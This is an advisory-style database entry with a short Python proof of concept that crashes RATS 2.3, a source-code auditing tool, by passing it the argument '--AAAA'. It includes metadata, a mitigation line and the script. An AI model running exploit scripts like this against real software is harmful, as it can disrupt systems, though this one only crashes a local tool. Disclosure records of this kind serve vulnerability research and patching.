Vendor: Rough Auditing Tool for Security
By: David Silveiro
CVSS: 7.5 (HIGH)
Type: Crash
CWE: 119
Product Name: Rough Auditing Tool for Security
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: YES
Related CWE: 0 day
CPE: 2.3:RATS
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 14.04 LTS
Year: 2016

POC RATS v2.3 Crash

This is a proof of concept for a crash vulnerability in RATS version 2.3. Running the command 'rats --AAAA' causes the application to crash. The proof of concept was written by David Silveiro and tested on Ubuntu 14.04 LTS.

Mitigation:

Update to the latest version of RATS to patch the vulnerability.

Exploit-DB raw data:

# Exploit Title: RATS 2.3 Crash POC
# Date: 25th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day

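from shlex import split
from subprocess import call


def crash():
    # Run RATS with the '--AAAA' argument that triggers the crash.
    try:
        com = split('rats --AAAA')
        # call() returns the exit status; on POSIX a negative value
        # means the process was terminated by a signal.
        return call(com)

    except FileNotFoundError:
        # Raised when the rats binary is not found on PATH.
        print("Is RATS installed?")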


def main():

    print("Author:   David Silveiro        ")
    print("Website:  Xino.co.uk            ")
    print("Title:    POC RATS v2.3 Crash \n")

    crash()


if __name__ == "__main__":
    main()